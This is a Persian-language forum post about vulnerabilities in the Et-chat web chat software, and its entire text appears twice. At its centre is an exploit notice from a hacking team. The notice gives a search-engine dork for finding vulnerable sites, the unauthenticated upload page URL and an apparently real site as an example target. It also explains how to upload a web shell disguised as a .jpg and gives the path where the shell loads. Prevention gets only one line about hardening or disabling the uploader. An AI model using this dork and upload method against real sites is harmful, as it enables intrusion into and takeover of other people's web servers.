سلام بر عزیزان
سیستم Etchat یک نرم افزار تحت وب برای سرویس چت (تنها text) میباشد . در این تاپیک تمامی آسیب پذیری ها این سیستم مورد بررسی و راههای جلوگیری از نفوذ این سیستم مطرح میشود .
با توجه به نوع کد نویسی این سیستم میتوان به آماتور بودن Programmer این سیستم پی برد .
ضعف در هسته آپلودر - مشکلات فایل های داخلی - کنترل آپلود فایل - سیکور نبودن عناصر TextBox و ....
از مشکلات اساسی این مجموعه میباشد . مدتی قبل ما این سیستم را بطور آزمایشی بر روی یکی از وبسایت های دوستان راه اندازی نمودیم که در ابتدا آپلودر را بستیم پس از مدتی باز گذاشتیم و امکان آپلود شل به وجود آمد در این بخش به روش های نفوذ و راههای جلوگیری از نفوذ به این سیستم ها میپردازیم . متاسفانه افرادی که در این زمینه فعالیت میکنند بصورت تخصصی این سیستم را مورد آنالیز قرار نداده اند .
آسیب پذیری های کشف شده توسط تیم :
Et-chat remote file uploader
[align=left]
-------------------- IN The NAme OF God --------------------
-====Et-chat remote file uploader (RFU)====-
# Exploit Title:Et-chat remote file uploader (RFU)
# Exploit Author: FarbodEZRaeL
# Tested on: xp
# MAil : [email protected]
-====Dork====-
inurl:/styles/admin_tpl/
-====Exploit====-
http://Site.C0M/styles/admin_tpl/createNewSmilies.tpl.html
-====Example====-
http://ya30chat.ir/styles/admin_tpl/createNewSmilies.tpl.html
-====information====-
Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~>
Sh3ll.jpg or Sh3ll.php.Jpg
-====Tnx To====-
Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz
MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members
~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
[/align]
این آسیب پذیری امکان آپلود شل و لود کردن شل از مسیر http://site.com/chat/smilies/shell.php را فراهم میسازد که یک اکسپلویت هم در این زمینه توسط یک تیم نوشته شده . همچنین میتوان به آپلود شل از طریق یوزر Admin یا همان مدیر از قسمت اضافه کردن شکلک ها اشاره نمود که برای این عمل یا باید آپلودر به صورتی لایه های امنیتی مناسبی داشته باشد و یا اینکه پس از ریختن شکلک های لازم این آپلودر غیر فعال شود .
در پست های آتی روش های نفوذ و جلوگیری از نفوذ را با یکدیگر پیش میرویم .
سیستم Etchat یک نرم افزار تحت وب برای سرویس چت (تنها text) میباشد . در این تاپیک تمامی آسیب پذیری ها این سیستم مورد بررسی و راههای جلوگیری از نفوذ این سیستم مطرح میشود .
با توجه به نوع کد نویسی این سیستم میتوان به آماتور بودن Programmer این سیستم پی برد .
ضعف در هسته آپلودر - مشکلات فایل های داخلی - کنترل آپلود فایل - سیکور نبودن عناصر TextBox و ....
از مشکلات اساسی این مجموعه میباشد . مدتی قبل ما این سیستم را بطور آزمایشی بر روی یکی از وبسایت های دوستان راه اندازی نمودیم که در ابتدا آپلودر را بستیم پس از مدتی باز گذاشتیم و امکان آپلود شل به وجود آمد در این بخش به روش های نفوذ و راههای جلوگیری از نفوذ به این سیستم ها میپردازیم . متاسفانه افرادی که در این زمینه فعالیت میکنند بصورت تخصصی این سیستم را مورد آنالیز قرار نداده اند .
آسیب پذیری های کشف شده توسط تیم :
Et-chat remote file uploader
[align=left]
-------------------- IN The NAme OF God --------------------
-====Et-chat remote file uploader (RFU)====-
# Exploit Title:Et-chat remote file uploader (RFU)
# Exploit Author: FarbodEZRaeL
# Tested on: xp
# MAil : [email protected]
-====Dork====-
inurl:/styles/admin_tpl/
-====Exploit====-
http://Site.C0M/styles/admin_tpl/createNewSmilies.tpl.html
-====Example====-
http://ya30chat.ir/styles/admin_tpl/createNewSmilies.tpl.html
-====information====-
Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~>
Sh3ll.jpg or Sh3ll.php.Jpg
-====Tnx To====-
Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz
MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members
~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
[/align]
این آسیب پذیری امکان آپلود شل و لود کردن شل از مسیر http://site.com/chat/smilies/shell.php را فراهم میسازد که یک اکسپلویت هم در این زمینه توسط یک تیم نوشته شده . همچنین میتوان به آپلود شل از طریق یوزر Admin یا همان مدیر از قسمت اضافه کردن شکلک ها اشاره نمود که برای این عمل یا باید آپلودر به صورتی لایه های امنیتی مناسبی داشته باشد و یا اینکه پس از ریختن شکلک های لازم این آپلودر غیر فعال شود .
در پست های آتی روش های نفوذ و جلوگیری از نفوذ را با یکدیگر پیش میرویم .
نظر